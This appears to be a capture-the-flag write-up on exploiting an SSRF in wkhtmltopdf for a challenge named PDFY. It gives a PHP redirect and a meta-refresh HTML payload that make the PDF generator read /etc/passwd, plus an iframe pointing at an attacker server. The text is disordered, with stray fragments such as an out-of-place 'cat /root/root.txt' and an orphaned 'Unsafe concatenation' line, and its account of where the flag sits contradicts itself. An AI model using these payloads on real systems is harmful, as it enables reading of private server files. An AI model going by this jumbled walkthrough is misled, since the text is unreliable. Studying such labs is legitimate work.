This updated write-up covers the core vulnerability (an SSRF in wkhtmltopdf), two practical attack strategies, and a step-by-step walkthrough to capture the flag.
First, start a simple PHP web server on your local machine:
<?php header('Location: file:///etc/passwd'); ?>
PDFY
IP Address: 10.10.11.27
Difficulty: Medium
OS: Linux
Release Date: May 2024 (approx.)
The generated PDF will contain the contents of /etc/passwd, where the flag is appended. Download or view the PDF to obtain the flag.
cat /root/root.txt
The wkhtmltopdf tool will process this HTML, see the <iframe>, and make a request to the URL within it (http://our-server.com/axura.php?...). Our script, axura.php, will then respond with a redirect to file:///etc/passwd. The wkhtmltopdf tool will faithfully follow this redirect as well, and attempt to include the content of the local file into the PDF.
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="refresh" content="0; url=file:///etc/passwd" />
</head>
<body>
  <p>Redirecting...</p>
</body>
</html>
→ Unsafe concatenation.
The SSRF vulnerability in wkhtmltopdf can be triggered by inserting an iframe that points to an internal asset’s IP address or a local file, causing the tool to fetch the embedded resource.